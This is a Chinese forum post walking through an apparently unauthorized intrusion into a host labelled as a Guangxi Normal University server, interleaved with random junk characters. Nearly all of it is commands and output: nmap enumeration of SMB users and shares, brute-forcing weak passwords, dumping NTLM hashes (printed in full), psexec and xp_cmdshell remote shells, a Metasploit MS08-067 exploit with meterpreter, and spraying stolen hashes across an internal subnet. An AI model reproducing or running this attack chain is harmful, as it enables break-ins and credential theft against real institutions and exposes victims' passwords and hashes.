广西师范网站http://202.103.242.241/
8 o8 r5 K. l4 q
5 e- \! R0 I( J/ u' E" r6 proot@bt:~# nmap -sS -sV 202.103.242.241
8 T! m% v: c6 v- o1 H' ~6 X) |$ n9 O8 Z+ j2 A! a
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST( O/ a6 f& W" |! K/ i, z- d
& U$ y1 `4 D% @/ D3 t
Nmap scan report for bogon (202.103.242.241)$ N( Y& g F0 L& U, \; S7 M
0 H4 }% [# T/ ZHost is up (0.00048s latency).
& I9 f. Y6 ^4 A1 b) p! T8 ?, _: l/ @2 {* R) j
Not shown: 993 closed ports
% k* t6 }5 C8 n/ ?: n
! O; |4 V9 \8 ?PORT STATE SERVICE VERSION1 I% U- u0 \! x; Q+ S1 P7 P
6 U) a6 {5 y2 k& s5 l) k) h& H G) D135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)" U6 g5 x3 y9 L/ H0 T! Z/ q
4 @; h J: E8 s1 F( K3 z
139/tcp open netbios-ssn
& m) }# h, ~- X% R3 A" {. G' o* g# ?$ W0 C4 @$ [2 S
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
! G( r2 }8 _6 g2 m
2 f" \1 J. Y7 r1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)) h) ~- O' e1 [0 ]6 u& q9 k) D
* O# ]$ G5 @: A1026/tcp open msrpc Microsoft Windows RPC
/ x1 \3 x0 }( j% A9 Q$ D
4 M1 N+ F' K$ d) K3 Q& q3372/tcp open msdtc?6 z: d! ~/ O9 s1 }
* b: S$ w, c3 ^. f' w- @: E
3389/tcp open ms-term-serv?+ i! {1 m+ s( {3 g
! i9 t& j) z4 O) G* J I1 h1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :" T- J( i( ~% ]! h6 e
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r0 t' H( ^, i4 i2 [& n
7 N$ r( L+ ?( T; V7 K
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions' ^- E& A8 L5 T0 W; }2 S
Q3 F% N1 E& Y7 A5 `
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
( T1 G5 o0 l+ x. _. E9 O) e0 o/ w. L. ]6 m$ n) ^# y
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO; a' A$ _2 D# _" k5 N; c! r
6 n. x3 p5 u1 w% K! [
SF:ptions,6,”hO\n\x000Z”);
# P2 n4 f& {2 ^5 v# V$ D; N; E, H6 E+ T) w: a
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
8 t- e9 L( Q" ]- R# ]# o7 b3 w' Q. G
; s6 A/ j! b, ~& C/ L1 {Service Info: OS: Windows0 Z: S9 U, \: F Y+ j
! g4 h& D) G ?8 F. D* t0 M1 y' WService detection performed. Please report any incorrect results at http://nmap.org/submit/ ." W% y0 {" q4 R! a1 C5 Z h+ p
5 z* a7 W8 f: U" V( sNmap done: 1 IP address (1 host up) scanned in 79.12 seconds( K! S" Y; [1 e7 z, |
: Z" u: u9 M: P( j" c h1 i
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本/ ^9 R$ ^5 i9 G2 \+ c
) u2 I2 G( Y! ^: @
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse# u/ P' x; V" k$ ^. R
% t) t0 V+ i, B* @-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse6 V1 K( n0 z: _# r& n! k0 m* F
1 S6 K/ i7 \7 Q0 c( Y
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
) ~: i& v( M* _0 e/ u2 m7 [5 g* g2 J4 `5 |4 J
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse" i; ?5 U% S. J- C' S4 d t0 N
( m' Q1 T" i6 g-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
3 i2 m& L/ f; B- N
7 F/ F% b8 D7 E4 B8 ^, p q-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
, o+ W* c# q3 i: |! W# {# V
8 k* a$ W! o4 X1 Q2 g" G-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
$ J1 N: Y2 I' Z9 l/ p/ W8 u; A" `9 g+ C' p& I
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse$ ~% _: @) J7 j# v+ q% }
+ G* i" M( X6 [# K' x-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
- h- R1 h0 b# s& ^: ]" v4 S2 m- [4 K6 u* { C8 [5 t
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse9 C+ { t1 b3 b
; N( R! R2 o. c7 ?) b" y
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse0 O# W* |; F9 \- L+ I$ J
* I: }( q2 E* D6 \- O' T. w. X-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse ^6 ^4 Y) u: I8 x( Q; U
# {( t- ^) J% ~( }( z% Y-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
. R1 w5 Q2 }; }7 _+ W2 J- I* K
0 w. r4 J2 C1 i9 E; m-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
# Y! u, I5 n0 R; a( h$ \! M+ L! e! U) r9 ~5 ?/ i- y
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
1 A9 u! [( `* ^& B o [
; Z# E9 i$ i: G+ eroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
/ E9 w% Z, m! j4 E& h2 _$ o" s- C& L# f W. k( H
//此乃使用脚本扫描远程机器所存在的账户名
! Q5 j* b7 M5 j7 c. x6 F2 `" Y
3 `3 S# G! b& q3 a; tStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
, Q0 o8 d" U b
# B- `( G3 ~0 W P/ {# [, h: W2 NNmap scan report for bogon (202.103.242.241)
0 l: A! L! E0 j& @8 s) R7 K) O* a/ s3 ^( k8 Z& y$ \; l
Host is up (0.00038s latency).; `2 R- N9 O$ q- M' M& n
4 n+ i4 B) {, `$ |Not shown: 993 closed ports) b( z! |' s. h/ |) G' l
' ?% t& E s: Q% U
PORT STATE SERVICE
$ o$ A" P7 m9 \, W" _% B6 h
6 m) o7 P" i4 E+ Y135/tcp open msrpc. D- G1 m3 [( O5 ~' H
) h# A3 Q! F% K% _; `: H& ~, m
139/tcp open netbios-ssn# @: d( I4 p% _4 F% e" {2 y
5 d6 c2 e1 T5 T1 a9 Y445/tcp open microsoft-ds
1 M: W: b$ q' ~4 M0 J- Z# F" m5 [9 K" X7 E. g
1025/tcp open NFS-or-IIS- x' X, D& w: x L+ j0 `
+ i; n2 B3 Y0 T( m7 J: ?$ O1026/tcp open LSA-or-nterm% d0 U- g* l2 U) E) j6 S' B8 b
1 I: u( a. |2 ]* O% n3372/tcp open msdtc
& c6 X8 W& ~. G) g3 W+ I3 W) Y/ z, }9 v- S' E- `6 \' y5 y9 O5 H
3389/tcp open ms-term-serv
- x* k2 q. {' D+ m" s" ]3 U8 O3 y E) e8 W% G; h
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ \+ N; ^7 b5 Q- c( p2 ?! z
( P9 l- o" _; { K6 S& I# ] g
Host script results:' a2 S8 v. @% @- r e, F
7 q' f4 Z1 R/ B' m. d3 H| smb-enum-users:) N7 d1 a4 n( ?# ^0 o3 [
9 \, @! i+ y- ?( s6 ^& l6 R" o+ v& D|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果% j5 ]6 P. f6 m/ b5 C( v
) _/ d; z$ }: R9 t" Q, B. a5 _Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds6 ~! [9 [! [, b+ n" q( i( M* P( c( q6 U
6 k. S* x& C/ E" n' i& [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
; t/ ^0 G8 {; ^5 v" J$ @8 ?5 M- v6 F) H2 Y+ g; h
//查看共享! _' s. }+ G3 l% v2 {0 J" G4 Q" `
- r! H/ n- i! S+ b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
- q5 W+ o& K D; q
' u0 H6 N- |( v" D$ t: K$ K, nNmap scan report for bogon (202.103.242.241). E+ ?! _3 X6 c( C( S0 b
% S6 b7 h6 |( Z1 Y. }" K
Host is up (0.00035s latency).) c* @, o5 s) n# H! C
3 w6 L: {& P: ~- F8 L% ?. L& ~
Not shown: 993 closed ports
) r, {5 Y6 k; f8 m s0 y" r6 x. s! y& z# j# s. m) y
PORT STATE SERVICE) N( n. `2 S+ n' T$ K, m
4 k1 _$ X7 ~8 U135/tcp open msrpc% ~6 C" j* P+ g6 N- ?, {6 ^
0 _8 s1 g: {0 ~: w139/tcp open netbios-ssn% }% u: T# i; A& i4 w( G" l
4 ^/ k+ z& C+ ]/ c5 v# M
445/tcp open microsoft-ds% p; H1 p' E, w$ D9 F! n
: E- a9 f6 h% k. \- l% g1025/tcp open NFS-or-IIS
5 G: C7 w6 g- L0 v5 n/ w" ^
3 g+ H+ e) } Y2 B) B& z1026/tcp open LSA-or-nterm
# E6 a) s, X) s, Q
( U& z/ O& B0 t# b3372/tcp open msdtc
9 p4 j7 N& ^! t. F/ X0 _
+ s9 i4 X6 ]: [( @- k3389/tcp open ms-term-serv: [0 E. V8 T$ s8 g0 j6 l! F
5 I5 d' t6 ?( m; h3 h3 |! MMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ S1 [& _5 D% q
1 M# P9 H8 f6 F& T& t/ m. p
Host script results:
: T& C6 C9 A+ A j$ ^3 M9 _) O; g7 K; X o; Z/ s& v$ e
| smb-enum-shares:" g8 ?, }+ X+ l; A0 k' l
. v. H* s. I5 u% R| ADMIN$: Z/ {; C2 l% m$ w1 G1 U1 x6 J
% z; z1 y3 S$ w O! U S0 I4 ^. t
| Anonymous access: <none>* N/ H# [( [. H$ A
' ?, I$ S; N0 v+ `* ~
| C$
4 q' F/ l! C; Y t
" P/ `* v0 P9 w$ P| Anonymous access: <none>
& \9 \1 A/ Y/ F( v0 l
) p3 P9 _( Y# h4 C/ t$ S| IPC$% f9 ?) q+ i( U4 p
4 ^. C8 f6 L/ G! n! c$ @4 D) X/ l* E|_ Anonymous access: READ
$ X2 e9 O1 d" z( Y2 E" A+ B( t+ S* @) o3 L! j
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds* v. n' S' }# G2 ~
3 W& E6 Q, Q( M( K0 J# E1 c
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
Z6 V6 p+ M( H3 S6 F6 q" _# U2 @( k
//获取用户密码& S, _5 f% t) O
; p% \4 M4 U2 f% U8 o: j8 V8 h: dStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
3 y, W! m7 s+ y/ F, P$ X7 T8 ^; _1 V4 m6 Q
Nmap scan report for bogon (202.103.242.2418)$ c {4 f. Q0 E" Q
5 c0 W$ W. T( h* x: N% _
Host is up (0.00041s latency).6 P7 ]/ K, }. X+ }' t
1 ` }8 Z \) S3 g/ RNot shown: 993 closed ports
2 N) f* F$ D5 Y+ U4 L2 L8 E m6 @' b, J% o
PORT STATE SERVICE1 x( L: R) c! ~) R; ^3 M
" K7 k, P r! i B1 S2 l( J9 }135/tcp open msrpc
% `( d, ^, @! ^$ W+ p1 u% m. i% B/ u x- X; K
139/tcp open netbios-ssn4 T& E! |; ~4 e6 i! \2 }) o9 u
- J" C: i* V/ d& ~ E/ r445/tcp open microsoft-ds
# q5 z$ W9 h( y* u; X8 O; |
& {6 A. I* ?3 K( i1 ?1025/tcp open NFS-or-IIS7 g# F3 h$ S$ [6 m4 |* L6 I$ ^
$ y" a9 f" X& ~5 U% u/ b: f1026/tcp open LSA-or-nterm
; [: n* E, Z& S6 s) ?2 p) x/ j
2 E8 s8 A1 ?3 E6 p \3372/tcp open msdtc2 K' y# S$ w3 e+ V0 g/ Z! F
0 r" e1 T8 w7 L, u1 `3 l
3389/tcp open ms-term-serv
- _1 E2 f7 _. n/ A* e4 d0 k4 Q% O, x" d# ^ H! G
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ ~) @0 ]8 s, Y( T' ]. s' h; n$ ~9 t& w$ @( r. X
Host script results:
4 ]6 p5 M9 {( E. C3 {6 S! F) ]& b% [, a" X5 J9 k# h1 T
| smb-brute:0 i" s w, u" Q# X1 r" b- B
: {; b) z3 `' p O
administrator:<blank> => Login was successful
+ J/ l/ F7 E; [ x
2 E8 L9 ~+ [7 ?! n|_ test:123456 => Login was successful
% {' i% P. X: o, t( s" Q( ` w+ z: i* d
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
: r6 G6 f( h( J3 e y9 i: f1 `' v; K) ?; r% L6 X; @/ ]
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash T* _; I2 D/ A" H& i9 W( W
. K/ Z: c/ E+ z; @" q
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
) V9 U7 Z/ M$ Y% j8 L, A7 J2 K: u9 y" i* d5 R: F D8 O
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
5 M& T$ _+ e3 {1 Z1 o( A F2 s- o1 }$ f: P7 u$ w5 g" w
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139& b8 e5 m# h% E0 t
9 O1 o& @. v, A! \" IStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
, E) O/ }/ B8 N5 U* z* h# n
/ U, u' a; ^( J4 f2 yNmap scan report for bogon (202.103.242.241)" D1 x: C4 G8 f
" z" j" T) K* s+ ^) g( E- u; L" }% xHost is up (0.0012s latency).
+ P0 n6 z& @4 }3 Q9 b
' i0 Q* Y3 Q) H$ VPORT STATE SERVICE* u5 R2 t- L8 @1 J
- ~, a+ o" _* P% c) j& a135/tcp open msrpc& H" N" k# o% ?7 d
! D' O* f5 x7 Y* D/ B' ]! m/ A# w* r: Y139/tcp open netbios-ssn
; P2 G" f" @" I }
9 Z3 w3 a; S' q1 L) {. H: t' A1 g445/tcp open microsoft-ds
7 d6 c1 g; G: _- i2 F
1 l$ W6 Y3 i2 j5 S5 o! `MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# t1 ]8 T1 Q9 v7 i
5 [: j. N: T% n0 Y7 ^5 b" r z6 `
Host script results:" T! r1 k+ a5 U
: O3 _2 O- c2 ]
| smb-pwdump:# Q! T' `* F% @6 T. k
( \4 I8 a8 z, K# g8 I; Q2 T| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
1 q! [1 F8 t& H$ n+ D# A, V
( {1 Q) q0 y- U3 n1 @+ w0 B1 r: M| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
8 \/ G/ V# p$ x+ f( T. P& k- p9 p3 q: [% ]: K, o; A* P2 u
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
6 U: X% q1 \: W( a1 E3 U5 z- R' u( } o* Z* O
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2 p" m/ O. U. W) j' t+ u; F
$ x) H) Z; t( b% I& tNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
) V3 M" Q+ o0 ]# D2 h4 Z
4 e5 \8 E( C6 x, Q6 w3 a |' W# T) j+ HC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell: @) B% D) m, P7 s7 C* ^2 t
0 n" z+ F& h9 E8 j, d8 Q s-p 123456 -e cmd.exe ?; o$ l) _! j: U4 {) o) `2 @
9 d1 d h: j! D0 M; n4 JPsExec v1.55 – Execute processes remotely
1 ] u0 g2 o! U6 \! X) v
2 p! J1 b6 Y2 V6 DCopyright (C) 2001-2004 Mark Russinovich0 f% @, H8 ^# a! A6 J3 @! Z( @
4 s: X* y+ R! }+ z$ p$ T) VSysinternals – www.sysinternals.com
5 Q5 L _/ P9 k* p' {. z: |; _ Y" k
Microsoft Windows 2000 [Version 5.00.2195]' z3 W9 V$ o: t2 J3 _
" z9 X, Y# F O9 m# X0 v# |& h
(C) 版权所有 1985-2000 Microsoft Corp.
7 X+ @ T2 X6 i3 Q% S4 Y8 w, y
" m8 c. o( [, |4 p" [: ~; hC:\WINNT\system32>ipconfig7 }7 h' l& o/ g& _$ m
0 y. I M+ |+ @& j, b/ e+ |1 XWindows 2000 IP Configuration
! m9 ?' z7 s( Q$ F/ D3 v8 [& N) {* i( b+ v# R3 j
Ethernet adapter 本地连接:
' z& R& [ h/ S( k2 l5 d& I- G0 Z$ V5 J6 \ H
Connection-specific DNS Suffix . :9 Q& N/ n0 i6 f
: Y4 F1 G: \; U$ j, N7 c% BIP Address. . . . . . . . . . . . : 202.103.242.241
" v& [, L7 p& ~8 e$ e7 [+ I
5 s' ?4 o& ^, {2 q/ X+ R% c" OSubnet Mask . . . . . . . . . . . : 255.255.255.0. Q+ Z0 [5 B0 |' D- [. Q7 S& P
- _5 [5 b& b4 {- P& Y2 W, E$ w
Default Gateway . . . . . . . . . : 202.103.1.13 u* v% X. `2 m; d/ X% G8 [# e' E
# b6 u" D8 T8 V5 P2 V# F0 ?$ GC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
6 p3 n% c. J: j. v
( x; g, p* f0 iroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
3 I" P' v9 q" l" Y; V( u0 h- E5 @) c/ N
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
7 [! ?9 O5 D& J6 y8 _
! t9 D! M& D4 k {& `8 }9 CNmap scan report for bogon (202.103.242.241)
& h) }$ q" l" ?
$ {0 H0 A* I3 }: z0 ]* s g. xHost is up (0.00046s latency).
0 G/ |+ b: C, Y0 r0 d
1 J8 E+ ]! _$ }5 Z/ N9 ~: K* ^Not shown: 993 closed ports
( V1 G. k3 C) J* \
, A. I9 l: I+ T8 OPORT STATE SERVICE/ @* O) O# { B# z2 s* A1 _0 a1 V
0 l1 ^9 n; d: ^8 g+ G) b+ V" j
135/tcp open msrpc3 r$ ?1 Y, |- U/ G
t7 o& K2 B' F1 y# P
139/tcp open netbios-ssn$ C, t- d: m9 P# E; W+ `1 |3 ?
* k W, V. ?( n1 ^4 d+ w
445/tcp open microsoft-ds- c7 d/ X- y$ t2 s% ?" Y1 z+ f' @
0 d/ ?* u; ]7 X/ ^8 m+ c1025/tcp open NFS-or-IIS3 w/ |- P/ j" `* I' A$ y9 i" u7 W' w
" ]7 e0 q. e: z) H$ H8 x& Z0 l
1026/tcp open LSA-or-nterm) |# `3 S( |* }" W
+ p# B* |3 e2 S5 Q
3372/tcp open msdtc7 G+ Y$ Z. B# _, |2 a+ a# ^
O, [4 j+ ?# [4 p4 c: B/ H) w
3389/tcp open ms-term-serv
: A2 n: h8 f4 [) {! `
& o- f d' q# e j& k2 }! W" mMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 U" Z% `- L* i# D* W- L" B7 v1 ?; P8 }
Host script results:
) C4 v$ M |/ l* w8 N4 q( v) I% v7 U* i( x$ k
| smb-check-vulns:' T" @* `2 @, [. P* `% s' {7 m
8 p( J1 `0 A- T$ D9 O
|_ MS08-067: VULNERABLE
l [/ G5 g2 N( r6 |) M. `: i% N! y- e; f+ m
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds& G0 {6 y, J: m1 S
/ B7 h K7 i8 T9 T( l, |
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出" u, i' F) o' K9 j
8 q) P& L2 @! f) n, s; c9 R; _
msf > search ms08# x& e& A7 N& Q$ u; G$ z
- d* D! D8 f H4 n# R% U/ h
msf > use exploit/windows/smb/ms08_067_netapi) o2 { t& a' G7 j6 b$ d ]7 x. A& b, n
% h# x* V0 p. A/ f3 u
msf exploit(ms08_067_netapi) > show options
8 `% S9 x8 q& L1 ~8 j
4 F H0 Z2 P6 a$ D- b8 fmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241( ^. Q' G5 T2 Z* O& }
0 v, Z( B3 y. Z& Cmsf exploit(ms08_067_netapi) > show payloads
) k8 O0 P4 P( n
! e/ l8 |3 O2 dmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp. j# V9 P$ t$ d( v W" h
5 D/ u, J4 V8 v: \ z* G" o) L
msf exploit(ms08_067_netapi) > exploit
( l. G7 l8 b9 C! L- j" p* a5 j, m4 G" t7 D& Z. \" e1 A
meterpreter >
" i5 `9 h: b, B1 M& B5 i' i. D4 @2 ~) \7 }: a+ A4 W1 r
Background session 2? [y/N] (ctrl+z)
9 k/ Y, N' S! I
3 k9 W1 }0 \5 p% G1 O) p, Y$ Lmsf exploit(ms08_067_netapi) > sessions -l# a/ B$ m7 x% h7 O/ j
7 f7 ~1 ~& x1 e3 {" R) g
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt* i" ?9 P. Y: R' b6 E0 Q
3 P H- X& H! \( C' d; j; E: @' e' Q) ntest" B6 L P/ h" U7 f* N+ D _3 }
" c. a4 h: d. ^
administrator+ a4 a$ p6 o8 e5 ^" Y6 u
/ U. V6 r* ^- h" O- Q& T$ Nroot@bt:/usr/local/share/nmap/scripts# vim password.txt
$ W" ?3 b/ p1 {* A1 j/ k% T5 G" Q$ s( _( V, ~" c& S' i
44EFCE164AB921CAAAD3B435B51404EE
2 d7 ^7 r. Q+ h" ]1 ~: m+ G
' _ ^( ~( n# {' X7 \root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
8 b* [+ c& E/ g2 H4 e$ X1 I
+ Y- b, G/ t% S' L //利用用户名跟获取的hash尝试对整段内网进行登录$ T! ` L0 Y! Q. [1 o$ ~, e% f
7 Z' ]+ e% m6 e& s( kNmap scan report for 192.168.1.105# ?3 I ]6 V: K3 | m3 ?
3 v. K) f( R" xHost is up (0.00088s latency).; ?3 i6 w6 ^( P+ g2 Q' q
3 s0 H3 A8 N& B/ T
Not shown: 993 closed ports
' O! }; M1 P4 [& h
" [+ D y ?; M+ b2 `9 H5 Y: D# EPORT STATE SERVICE
; D# }5 j& E# H1 z
2 u5 `7 [, O u135/tcp open msrpc
. f* Q+ X" v/ v+ B; [& Z& i7 j4 d9 O
139/tcp open netbios-ssn
6 P4 x" C, N/ u, j
& @3 C( P% s3 W# |# c9 k+ c8 V445/tcp open microsoft-ds
) R9 b3 W& e/ D2 `6 [% j4 t- v: X J0 x1 r/ }% Q8 S& N. Z$ S
1025/tcp open NFS-or-IIS
0 Z2 q# q4 @0 k, e, Z, M' z9 U8 L* P( R' Q; K! L0 w& x- m
1026/tcp open LSA-or-nterm! |3 q9 F9 F: T
& D9 }! d" c. J# J( ], W! v/ b3372/tcp open msdtc5 T; a8 K* ?" I' P l/ N0 v
* M. W Q3 C: b! {) k/ x$ U
3389/tcp open ms-term-serv5 v7 C7 j" n( n0 b* r0 g
6 `! k: G5 {9 r! H* r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
5 w; x+ M, ~5 W# y2 g( {, _- T `( ]9 F& Y* I- n
Host script results:
" n( Y9 \# U" B8 h' p9 r
# C- J( s' C) E2 ^| smb-brute:
6 k( i, \- [; r% k+ p, U9 X% S7 k
|_ administrator:<blank> => Login was successful5 Q0 U, y7 F" F! B+ @0 m& a$ e& i
' [# m% r& b; U* Q6 m+ z/ r$ y
攻击成功,一个简单的msf+nmap攻击~~·6 W) b) x$ C/ B3 F& [' t1 `" ]- ?/ d
6 y0 m" H( i2 h& V( ] |
发表于 2012-12-4 12:46:42
收藏
支持
反对